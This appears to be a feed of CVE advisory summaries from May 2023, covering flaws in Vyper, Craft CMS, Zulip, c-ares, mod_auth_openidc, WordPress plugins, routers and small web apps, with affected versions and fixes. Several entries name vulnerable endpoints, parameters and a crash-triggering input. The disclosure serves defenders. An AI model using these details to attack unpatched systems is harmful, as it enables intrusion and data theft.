🚨 CVE-2023-32675Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. In contracts with more than one regular nonpayable function, it is possible to send funds to the default function, even if the default function is marked `nonpayable`. This applies to contracts compiled with vyper versions prior to 0.3.8. This issue was fixed by the removal of the global `calldatasize` check in commit `02339dfda`. Users are advised to upgrade to version 0.3.8. Users unable to upgrade should avoid use of nonpayable default functions.🎖@cveNotify |
|
| 2023-05-26 19:58:32 |
🚨 CVE-2023-32679Craft CMS is an open source content management system. In affected versions of Craft CMS an unrestricted file extension may lead to Remote Code Execution. If the name parameter value is not empty string('') in the View.php's doesTemplateExist() -> resolveTemplate() -> _resolveTemplateInternal() -> _resolveTemplate() function, it returns directly without extension verification, so that arbitrary extension files are rendered as twig templates. When attacker with admin privileges on a DEV or an improperly configured STG or PROD environment, they can exploit this vulnerability to remote code execution. Code execution may grant the attacker access to the host operating system. This issue has been addressed in version 4.4.6. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-05-26 19:58:30 |
🚨 CVE-2023-32677Zulip is an open-source team collaboration tool with unique topic-based threading. Zulip administrators can configure Zulip to limit who can add users to streams, and separately to limit who can invite users to the organization. In Zulip Server 6.1 and below, the UI which allows a user to invite a new user also allows them to set the streams that the new user is invited to -- even if the inviting user would not have permissions to add an existing user to streams. While such a configuration is likely rare in practice, the behavior does violate security-related controls. This does not let a user invite new users to streams they cannot see, or would not be able to add users to if they had that general permission. This issue has been addressed in version 6.2. Users are advised to upgrade. Users unable to upgrade may limit sending of invitations down to users who also have the permission to add users to streams.🎖@cveNotify |
|
| 2023-05-26 19:58:29 |
🚨 CVE-2023-28623Zulip is an open-source team collaboration tool with unique topic-based threading. In the event that 1: `ZulipLDAPAuthBackend` and an external authentication backend (any aside of `ZulipLDAPAuthBackend` and `EmailAuthBackend`) are the only ones enabled in `AUTHENTICATION_BACKENDS` in `/etc/zulip/settings.py` and 2: The organization permissions don't require invitations to join. An attacker can create a new account in the organization with an arbitrary email address in their control that's not in the organization's LDAP directory. The impact is limited to installations which have this specific combination of authentication backends as described above in addition to having `Invitations are required for joining this organization` organization permission disabled. This issue has been addressed in version 6.2. Users are advised to upgrade. Users unable to upgrade may enable the `Invitations are required for joining this organization` organization permission to prevent this issue.🎖@cveNotify |
|
| 2023-05-26 19:58:28 |
🚨 CVE-2022-45457Sensitive information disclosure and manipulation due to improper certification validation. The following products are affected: Acronis Agent (Windows) before build 29633, Acronis Cyber Protect 15 (Windows) before build 30984.🎖@cveNotify |
|
| 2023-05-26 19:58:27 |
🚨 CVE-2022-45458Sensitive information disclosure and manipulation due to improper certification validation. The following products are affected: Acronis Agent (Windows, macOS, Linux) before build 29633, Acronis Cyber Protect 15 (Windows, macOS, Linux) before build 30984.🎖@cveNotify |
|
| 2023-05-26 19:58:25 |
🚨 CVE-2023-2822A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-229596.🎖@cveNotify |
|
| 2023-05-26 19:58:24 |
🚨 CVE-2023-1692The window management module lacks permission verification.Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2023-05-26 19:58:23 |
🚨 CVE-2021-46885The video framework has memory overwriting caused by addition overflow. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-05-26 19:58:22 |
🚨 CVE-2021-46882The video framework has memory overwriting caused by addition overflow. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-05-26 19:58:20 |
🚨 CVE-2021-46883The video framework has memory overwriting caused by addition overflow. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-05-26 19:58:19 |
🚨 CVE-2021-46884The video framework has memory overwriting caused by addition overflow. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-05-26 19:58:18 |
🚨 CVE-2021-46886The video framework has memory overwriting caused by addition overflow. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2023-05-26 19:58:17 |
🚨 CVE-2021-46887Lack of length check vulnerability in the HW_KEYMASTER module. Successful exploitation of this vulnerability may cause out-of-bounds read.🎖@cveNotify |
|
| 2023-05-26 19:58:16 |
🚨 CVE-2022-48478The facial recognition TA of some products lacks memory length verification. Successful exploitation of this vulnerability may cause exceptions of the facial recognition service.🎖@cveNotify |
|
| 2023-05-26 19:58:15 |
🚨 CVE-2022-48479The facial recognition TA of some products has the out-of-bounds memory read vulnerability. Successful exploitation of this vulnerability may cause exceptions of the facial recognition service.🎖@cveNotify |
|
| 2023-05-26 16:58:14 |
🚨 CVE-2021-24686The SVG Support WordPress plugin before 2.3.20 does not escape the "CSS Class to target" setting before outputting it in an attribute, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2023-05-26 16:58:13 |
🚨 CVE-2020-11514The Rank Math plugin through 1.0.40.2 for WordPress allows unauthenticated remote attackers to update arbitrary WordPress metadata, including the ability to escalate or revoke administrative privileges for existing users via the unsecured rankmath/v1/updateMeta REST API endpoint.🎖@cveNotify |
|
| 2023-05-26 10:58:35 |
🚨 CVE-2023-28382Directory traversal vulnerability in ESS REC Agent Server Edition series allows an authenticated attacker to view or alter an arbitrary file on the server. Affected products and versions are as follows: ESS REC Agent Server Edition for Linux V1.0.0 to V1.4.3, ESS REC Agent Server Edition for Solaris V1.1.0 to V1.4.0, ESS REC Agent Server Edition for HP-UX V1.1.0 to V1.4.0, and ESS REC Agent Server Edition for AIX V1.2.0 to V1.4.1🎖@cveNotify |
|
| 2023-05-26 10:58:34 |
🚨 CVE-2023-31124c-ares is an asynchronous resolver library. When cross-compiling c-ares and using the autotools build system, CARES_RANDOM_FILE will not be set, as seen when cross compiling aarch64 android. This will downgrade to using rand() as a fallback which could allow an attacker to take advantage of the lack of entropy by not using a CSPRNG. This issue was patched in version 1.19.1.🎖@cveNotify |
|
| 2023-05-26 10:58:33 |
🚨 CVE-2023-31130c-ares is an asynchronous resolver library. ares_inet_net_pton() is vulnerable to a buffer underflow for certain ipv6 addresses, in particular "0::00:00:00/2" was found to cause an issue. C-ares only uses this function internally for configuration purposes which would require an administrator to configure such an address via ares_set_sortlist(). However, users may externally use ares_inet_net_pton() for other purposes and thus be vulnerable to more severe issues. This issue has been fixed in 1.19.1.🎖@cveNotify |
|
| 2023-05-26 10:58:31 |
🚨 CVE-2023-31147c-ares is an asynchronous resolver library. When /dev/urandom or RtlGenRandom() are unavailable, c-ares uses rand() to generate random numbers used for DNS query ids. This is not a CSPRNG, and it is also not seeded by srand() so will generate predictable output. Input from the random number generator is fed into a non-compilant RC4 implementation and may not be as strong as the original RC4 implementation. No attempt is made to look for modern OS-provided CSPRNGs like arc4random() that is widely available. This issue has been fixed in version 1.19.1.🎖@cveNotify |
|
| 2023-05-26 10:58:30 |
🚨 CVE-2023-32067c-ares is an asynchronous resolver library. c-ares is vulnerable to denial of service. If a target resolver sends a query, the attacker forges a malformed UDP packet with a length of 0 and returns them to the target resolver. The target resolver erroneously interprets the 0 length as a graceful shutdown of the connection. This issue has been patched in version 1.19.1.🎖@cveNotify |
|
| 2023-05-26 10:58:29 |
🚨 CVE-2023-24329An issue in the urllib.parse component of Python before v3.11 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.🎖@cveNotify |
|
| 2023-05-26 00:58:21 |
🚨 CVE-2023-2903A vulnerability classified as problematic has been found in NFine Rapid Development Platform 20230511. This affects an unknown part of the file /SystemManage/Role/GetGridJson?keyword=&page=1&rows=20. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229977 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-26 00:58:20 |
🚨 CVE-2023-32074user_oidc app is an OpenID Connect user backend for Nextcloud. Authentication can be broken/bypassed in user_oidc app. It is recommended that the Nextcloud user_oidc app is upgraded to 1.3.2🎖@cveNotify |
|
| 2023-05-26 00:58:19 |
🚨 CVE-2023-32067c-ares is an asynchronous resolver library. c-ares is vulnerable to denial of service. If a target resolver sends a query, the attacker forges a malformed UDP packet with a length of 0 and returns them to the target resolver. The target resolver erroneously interprets the 0 length as a graceful shutdown of the connection. This issue has been patched in version 1.19.1.🎖@cveNotify |
|
| 2023-05-26 00:58:18 |
🚨 CVE-2023-2804A heap-based buffer overflow issue was discovered in libjpeg-turbo in h2v2_merged_upsample_internal() function of jdmrgext.c file. The vulnerability can only be exploited with 12-bit data precision for which the range of the sample data type exceeds the valid sample range, hence, an attacker could craft a 12-bit lossless JPEG image that contains out-of-range 12-bit samples. An application attempting to decompress such image using merged upsampling would lead to segmentation fault or buffer overflows, causing an application to crash.🎖@cveNotify |
|
| 2023-05-26 00:58:17 |
🚨 CVE-2023-2901A vulnerability was found in NFine Rapid Development Platform 20230511. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /SystemManage/User/GetGridJson?_search=false&nd=1680855479750&rows=50&page=1&sidx=F_CreatorTime+desc&sord=asc. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-229975. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-26 00:58:16 |
🚨 CVE-2023-2902A vulnerability was found in NFine Rapid Development Platform 20230511. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /SystemManage/Organize/GetTreeGridJson?_search=false&nd=1681813520783&rows=10000&page=1&sidx=&sord=asc. The manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229976. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-26 00:58:14 |
🚨 CVE-2023-31130c-ares is an asynchronous resolver library. ares_inet_net_pton() is vulnerable to a buffer underflow for certain ipv6 addresses, in particular "0::00:00:00/2" was found to cause an issue. C-ares only uses this function internally for configuration purposes which would require an administrator to configure such an address via ares_set_sortlist(). However, users may externally use ares_inet_net_pton() for other purposes and thus be vulnerable to more severe issues. This issue has been fixed in 1.19.1.🎖@cveNotify |
|
| 2023-05-26 00:58:13 |
🚨 CVE-2023-31147c-ares is an asynchronous resolver library. When /dev/urandom or RtlGenRandom() are unavailable, c-ares uses rand() to generate random numbers used for DNS query ids. This is not a CSPRNG, and it is also not seeded by srand() so will generate predictable output. Input from the random number generator is fed into a non-compilant RC4 implementation and may not be as strong as the original RC4 implementation. No attempt is made to look for modern OS-provided CSPRNGs like arc4random() that is widely available. This issue has been fixed in version 1.19.1.🎖@cveNotify |
|
| 2023-05-25 23:58:34 |
🚨 CVE-2021-32791mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. In mod_auth_openidc before version 2.4.9, the AES GCM encryption in mod_auth_openidc uses a static IV and AAD. It is important to fix because this creates a static nonce and since aes-gcm is a stream cipher, this can lead to known cryptographic issues, since the same key is being reused. From 2.4.9 onwards this has been patched to use dynamic values through usage of cjose AES encryption routines.🎖@cveNotify |
|
| 2023-05-25 23:58:33 |
🚨 CVE-2021-32792mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. In mod_auth_openidc before version 2.4.9, there is an XSS vulnerability in when using `OIDCPreservePost On`.🎖@cveNotify |
|
| 2023-05-25 23:58:32 |
🚨 CVE-2021-32785mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. When mod_auth_openidc versions prior to 2.4.9 are configured to use an unencrypted Redis cache (`OIDCCacheEncrypt off`, `OIDCSessionType server-cache`, `OIDCCacheType redis`), `mod_auth_openidc` wrongly performed argument interpolation before passing Redis requests to `hiredis`, which would perform it again and lead to an uncontrolled format string bug. Initial assessment shows that this bug does not appear to allow gaining arbitrary code execution, but can reliably provoke a denial of service by repeatedly crashing the Apache workers. This bug has been corrected in version 2.4.9 by performing argument interpolation only once, using the `hiredis` API. As a workaround, this vulnerability can be mitigated by setting `OIDCCacheEncrypt` to `on`, as cache keys are cryptographically hashed before use when this option is enabled.🎖@cveNotify |
|
| 2023-05-25 23:58:31 |
🚨 CVE-2021-32786mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. In versions prior to 2.4.9, `oidc_validate_redirect_url()` does not parse URLs the same way as most browsers do. As a result, this function can be bypassed and leads to an Open Redirect vulnerability in the logout functionality. This bug has been fixed in version 2.4.9 by replacing any backslash of the URL to redirect with slashes to address a particular breaking change between the different specifications (RFC2396 / RFC3986 and WHATWG). As a workaround, this vulnerability can be mitigated by configuring `mod_auth_openidc` to only allow redirection whose destination matches a given regular expression.🎖@cveNotify |
|
| 2023-05-25 23:58:30 |
🚨 CVE-2021-20718mod_auth_openidc 2.4.0 to 2.4.7 allows a remote attacker to cause a denial-of-service (DoS) condition via unspecified vectors.🎖@cveNotify |
|
| 2023-05-25 23:58:28 |
🚨 CVE-2019-20479A flaw was found in mod_auth_openidc before version 2.4.1. An open redirect issue exists in URLs with a slash and backslash at the beginning.🎖@cveNotify |
|
| 2023-05-25 23:58:27 |
🚨 CVE-2017-6059Mod_auth_openidc.c in the Ping Identity OpenID Connect authentication module for Apache (aka mod_auth_openidc) before 2.14 allows remote attackers to spoof page content via a malicious URL provided to the user, which triggers an invalid request.🎖@cveNotify |
|
| 2023-05-25 23:58:26 |
🚨 CVE-2017-6413The "OpenID Connect Relying Party and OAuth 2.0 Resource Server" (aka mod_auth_openidc) module before 2.1.6 for the Apache HTTP Server does not skip OIDC_CLAIM_ and OIDCAuthNHeader headers in an "AuthType oauth20" configuration, which allows remote attackers to bypass authentication via crafted HTTP traffic.🎖@cveNotify |
|
| 2023-05-25 23:58:24 |
🚨 CVE-2017-6062The "OpenID Connect Relying Party and OAuth 2.0 Resource Server" (aka mod_auth_openidc) module before 2.1.5 for the Apache HTTP Server does not skip OIDC_CLAIM_ and OIDCAuthNHeader headers in an "OIDCUnAuthAction pass" configuration, which allows remote attackers to bypass authentication via crafted HTTP traffic.🎖@cveNotify |
|
| 2023-05-25 23:58:23 |
🚨 CVE-2019-14857A flaw was found in mod_auth_openidc before version 2.4.0.1. An open redirect issue exists in URLs with trailing slashes similar to CVE-2019-3877 in mod_auth_mellon.🎖@cveNotify |
|
| 2023-05-25 23:58:22 |
🚨 CVE-2019-1010247ZmartZone IAM mod_auth_openidc 2.3.10.1 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Redirecting the user to a phishing page or interacting with the application on behalf of the user. The component is: File: src/mod_auth_openidc.c, Line: 3109. The fixed version is: 2.3.10.2.🎖@cveNotify |
|
| 2023-05-25 23:58:21 |
🚨 CVE-2023-2714The Groundhogg plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'check_license' functions in versions up to, and including, 2.7.9.8. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change the license key and support license key, but it can only be changed to a valid license key.🎖@cveNotify |
|
| 2023-05-25 23:58:20 |
🚨 CVE-2023-0950Improper Validation of Array Index vulnerability in the spreadsheet component of The Document Foundation LibreOffice allows an attacker to craft a spreadsheet document that will cause an array index underflow when loaded. In the affected versions of LibreOffice certain malformed spreadsheet formulas, such as AGGREGATE, could be created with less parameters passed to the formula interpreter than it expected, leading to an array index underflow, in which case there is a risk that arbitrary code could be executed. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.6; 7.5 versions prior to 7.5.1.🎖@cveNotify |
|
| 2023-05-25 23:58:19 |
🚨 CVE-2023-25439Stored Cross Site Scripting (XSS) vulnerability in Square Pig FusionInvoice 2023-1.0, allows attackers to execute arbitrary code via the description or content fields to the expenses, tasks, and customer details.🎖@cveNotify |
|
| 2023-05-25 23:58:18 |
🚨 CVE-2023-2255Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3.🎖@cveNotify |
|
| 2023-05-25 23:58:17 |
🚨 CVE-2023-33263In WFTPD 3.25, usernames and password hashes are stored in an openly viewable wftpd.ini configuration file within the WFTPD directory. NOTE: this is a product from 2006.🎖@cveNotify |
|
| 2023-05-25 23:58:15 |
🚨 CVE-2023-33278In the Store Commander scexportcustomers module for PrestaShop through 3.6.1, sensitive SQL calls can be executed with a trivial HTTP request and exploited to forge a blind SQL injection.🎖@cveNotify |
|
| 2023-05-25 23:58:14 |
🚨 CVE-2023-33279In the Store Commander scfixmyprestashop module through 2023-05-09 for PrestaShop, sensitive SQL calls can be executed with a trivial HTTP request and exploited to forge a blind SQL injection.🎖@cveNotify |
|
| 2023-05-25 23:58:13 |
🚨 CVE-2023-28625mod_auth_openidc is an authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. In versions 2.0.0 through 2.4.13.1, when `OIDCStripCookies` is set and a crafted cookie supplied, a NULL pointer dereference would occur, resulting in a segmentation fault. This could be used in a Denial-of-Service attack and thus presents an availability risk. Version 2.4.13.2 contains a patch for this issue. As a workaround, avoid using `OIDCStripCookies`.🎖@cveNotify |
|
| 2023-05-25 20:58:36 |
🚨 CVE-2023-2756SQL Injection in GitHub repository pimcore/customer-data-framework prior to 3.3.10.🎖@cveNotify |
|
| 2023-05-25 20:58:35 |
🚨 CVE-2023-31700TP-Link TL-WPA4530 KIT V2 (EU)_170406 and V2 (EU)_161115 is vulnerable to Command Injection via _httpRpmPlcDeviceAdd.🎖@cveNotify |
|
| 2023-05-25 20:58:34 |
🚨 CVE-2023-2608The Multiple Page Generator Plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to time-based SQL Injection via the orderby and order parameters in versions up to, and including, 3.3.17 due to missing nonce verification on the projects_list function and insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries leading to resource exhaustion via a forged request granted they can trick an administrator into performing an action such as clicking on a link. Version 3.3.18 addresses the SQL Injection, which drastically reduced the severity.🎖@cveNotify |
|
| 2023-05-25 20:58:33 |
🚨 CVE-2023-31856A command injection vulnerability in the hostTime parameter in the function NTPSyncWithHostof TOTOLINK CP300+ V5.2cu.7594_B20200910 allows attackers to execute arbitrary commands via a crafted http packet.🎖@cveNotify |
|
| 2023-05-25 20:58:29 |
🚨 CVE-2023-28076CloudLink 7.1.2 and all prior versions contain a broken or risky cryptographic algorithm vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability leading to some information disclosure.🎖@cveNotify |
|
| 2023-05-25 20:58:28 |
🚨 CVE-2023-31847In davinci 0.3.0-rc after logging in, the user can connect to the mysql malicious server by controlling the data source to read arbitrary files on the client side.🎖@cveNotify |
|
| 2023-05-25 20:58:27 |
🚨 CVE-2023-2740A vulnerability, which was classified as problematic, has been found in SourceCodester Guest Management System 1.0. Affected by this issue is some unknown functionality of the file dateTest.php of the component GET Parameter Handler. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229160.🎖@cveNotify |
|
| 2023-05-25 20:58:23 |
🚨 CVE-2023-33001Jenkins HashiCorp Vault Plugin 360.v0a_1c04cf807d and earlier does not properly mask (i.e., replace with asterisks) credentials in the build log when push mode for durable task logging is enabled.🎖@cveNotify |
|
| 2023-05-25 20:58:22 |
🚨 CVE-2023-30452The MoroSystems EasyMind - Mind Maps plugin before 2.15.0 for Confluence allows persistent XSS when saving a Mind Map with the hyperlink parameter.🎖@cveNotify |
|
| 2023-05-25 20:58:21 |
🚨 CVE-2023-33004A missing permission check in Jenkins Tag Profiler Plugin 0.2 and earlier allows attackers with Overall/Read permission to reset profiler statistics.🎖@cveNotify |
|
| 2023-05-25 20:58:17 |
🚨 CVE-2023-33005Jenkins WSO2 Oauth Plugin 1.0 and earlier does not invalidate the previous session on login.🎖@cveNotify |
|
| 2023-05-25 20:58:16 |
🚨 CVE-2023-33007Jenkins LoadComplete support Plugin 1.0 and earlier does not escape the LoadComplete test name, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-05-25 20:58:15 |
🚨 CVE-2021-26371A compromised or malicious ABL or UApp couldsend a SHA256 system call to the bootloader, which may result in exposure ofASP memory to userspace, potentially leading to information disclosure.🎖@cveNotify |
|
| 2023-05-25 18:58:34 |
🚨 CVE-2023-31722There exists a heap buffer overflow in nasm 2.16.02rc1 (GitHub commit: b952891).🎖@cveNotify |
|
| 2023-05-25 18:58:33 |
🚨 CVE-2023-2774A vulnerability was found in code-projects Bus Dispatch and Information System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file view_branch.php. The manipulation of the argument branchid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229280.🎖@cveNotify |
|
| 2023-05-25 18:58:32 |
🚨 CVE-2023-31701TP-Link TL-WPA4530 KIT V2 (EU)_170406 and V2 (EU)_161115 is vulnerable to Command Injection via _httpRpmPlcDeviceRemove.🎖@cveNotify |
|
| 2023-05-25 18:58:31 |
🚨 CVE-2023-31904savysoda Wifi HD Wireless Disk Drive 11 is vulnerable to Local File Inclusion.🎖@cveNotify |
|
| 2023-05-25 18:58:30 |
🚨 CVE-2023-2124An out-of-bounds memory access flaw was found in the Linux kernel’s XFS file system in how a user restores an XFS image after failure (with a dirty log journal). This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-05-25 18:58:29 |
🚨 CVE-2023-2775A vulnerability was found in code-projects Bus Dispatch and Information System 1.0. It has been classified as critical. This affects an unknown part of the file adminHome.php. The manipulation of the argument reach_city leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229281 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-25 18:58:28 |
🚨 CVE-2023-31903GuppY CMS 6.00.10 is vulnerable to Unrestricted File Upload which allows remote attackers to execute arbitrary code by uploading a php file.🎖@cveNotify |
|
| 2023-05-25 18:58:27 |
🚨 CVE-2023-2776A vulnerability was found in code-projects Simple Photo Gallery 1.0. It has been declared as critical. This vulnerability affects unknown code. The manipulation leads to unrestricted upload. The attack can be initiated remotely. VDB-229282 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-25 18:58:26 |
🚨 CVE-2023-32767The web interface of Symcon IP-Symcon before 6.3 (i.e., before 2023-05-12) allows a remote attacker to read sensitive files via .. directory-traversal sequences in the URL.🎖@cveNotify |
|
| 2023-05-25 18:58:25 |
🚨 CVE-2023-1972A potential heap based buffer overflow was found in _bfd_elf_slurp_version_tables() in bfd/elf.c. This may lead to loss of availability.🎖@cveNotify |
|
| 2023-05-25 18:58:24 |
🚨 CVE-2023-2780Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.🎖@cveNotify |
|
| 2023-05-25 18:58:22 |
🚨 CVE-2023-2203A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.🎖@cveNotify |
|
| 2023-05-25 18:58:21 |
🚨 CVE-2023-2491A flaw was found in the Emacs text editor. Processing a specially crafted org-mode code with the "org-babel-execute:latex" function in ob-latex.el can result in arbitrary command execution. This CVE exists because of a CVE-2023-28617 security regression for the emacs package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.🎖@cveNotify |
|
| 2023-05-25 18:58:20 |
🚨 CVE-2023-2731A NULL pointer dereference flaw was found in Libtiff's LZWDecode() function in the libtiff/tif_lzw.c file. This flaw allows a local attacker to craft specific input data that can cause the program to dereference a NULL pointer when decompressing a TIFF format file, resulting in a program crash or denial of service.🎖@cveNotify |
|
| 2023-05-25 18:58:19 |
🚨 CVE-2023-33750A stored cross-site scripting (XSS) vulnerability in mipjz v5.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description parameter at /index.php?s=/article/ApiAdminArticle/itemAdd.🎖@cveNotify |
|
| 2023-05-25 18:58:18 |
🚨 CVE-2023-33751A stored cross-site scripting (XSS) vulnerability in mipjz v5.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter at /app/tag/controller/ApiAdminTagCategory.php.🎖@cveNotify |
|
| 2023-05-25 18:58:17 |
🚨 CVE-2019-17201FastTrack Admin By Request 6.1.0.0 supports group policies that are supposed to allow only a select range of users to elevate to Administrator privilege at will. When a user requests elevation using the AdminByRequest.exe interface, the interface communicates with the underlying service (Audckq32.exe) using a .NET named pipe. If the underlying service responds that a user is permitted access to the elevation feature, the client then reinitiates communication with the underlying service and requests elevation. This elevation request has no local checks in the service, and depends on client-side validation in the AdminByRequest.exe interface, i.e., it is a vulnerable exposed functionality in the service. By communicating directly with the underlying service, any user can request elevation and obtain Administrator privilege regardless of group policies or permissions.🎖@cveNotify |
|
| 2023-05-25 18:58:16 |
🚨 CVE-2019-17202FastTrack Admin By Request 6.1.0.0 supports group policies that are supposed to allow only a select range of users to elevate to Administrator privilege at will. If a user does not have direct access to the elevation feature through group policies, they are prompted to enter a PIN code in a challenge-response manner upon attempting to elevate privileges. The challenge's response uses a simple algorithm that can be easily emulated via data (customer ID and device name) available to all users, and thus any user can elevate to Administrator privilege.🎖@cveNotify |
|
| 2023-05-25 18:58:15 |
🚨 CVE-2023-2700A vulnerability was found in libvirt. This security flaw ouccers due to repeatedly querying an SR-IOV PCI device's capabilities that exposes a memory leak caused by a failure to free the virPCIVirtualFunction array within the parent struct's g_autoptr cleanup.🎖@cveNotify |
|
| 2023-05-25 16:58:34 |
🚨 CVE-2023-2888A vulnerability, which was classified as problematic, was found in PHPOK 6.4.100. This affects an unknown part of the file /admin.php?c=upload&f=zip&_noCache=0.1683794968. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The identifier VDB-229953 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-25 16:58:33 |
🚨 CVE-2023-2770A vulnerability classified as critical was found in SourceCodester Online Exam System 1.0. This vulnerability affects unknown code of the file /kelasdosen/data. The manipulation of the argument columns[1][data] leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229276.🎖@cveNotify |
|
| 2023-05-25 16:58:32 |
🚨 CVE-2023-2771A vulnerability, which was classified as critical, has been found in SourceCodester Online Exam System 1.0. This issue affects some unknown processing of the file /jurusanmatkul/data. The manipulation of the argument columns[1][data] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229277 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-25 16:58:31 |
🚨 CVE-2023-2772A vulnerability, which was classified as critical, was found in SourceCodester Budget and Expense Tracker System 1.0. Affected is an unknown function of the file /admin/budget/manage_budget.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-229278 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-25 16:58:27 |
🚨 CVE-2023-2773A vulnerability has been found in code-projects Bus Dispatch and Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file view_admin.php. The manipulation of the argument adminid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-229279.🎖@cveNotify |
|
| 2023-05-25 16:58:26 |
🚨 CVE-2023-31703Cross Site Scripting (XSS) in the edit user form in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the from parameter.🎖@cveNotify |
|
| 2023-05-25 16:58:25 |
🚨 CVE-2023-31702SQL injection in the View User Profile in MicroWorld eScan Management Console 14.0.1400.2281 allows remote attacker to dump entire database and gain windows XP command shell to perform code execution on database server via GetUserCurrentPwd?UsrId=1.🎖@cveNotify |
|
| 2023-05-25 16:58:24 |
🚨 CVE-2023-31902RPA Technology Mobile Mouse 3.6.0.4 is vulnerable to Remote Code Execution (RCE).🎖@cveNotify |
|
| 2023-05-25 16:58:21 |
🚨 CVE-2023-31699ChurchCRM v4.5.4 is vulnerable to Reflected Cross-Site Scripting (XSS) via image file.🎖@cveNotify |
|
| 2023-05-25 16:58:20 |
🚨 CVE-2023-30508Multiple authenticated path traversal vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface. Successful exploitation of these vulnerabilities result in the ability to read arbitrary files on the underlying operating system, including sensitive system files.🎖@cveNotify |
|
| 2023-05-25 16:58:19 |
🚨 CVE-2023-30510A vulnerability exists in the Aruba EdgeConnect Enterprise web management interface that allows remote authenticated users to issue arbitrary URL requests from the Aruba EdgeConnect Enterprise instance. The impact of this vulnerability is limited to a subset of URLs which can result in the possible disclosure of data due to the network position of the Aruba EdgeConnect Enterprise instance.🎖@cveNotify |
|
| 2023-05-25 16:58:18 |
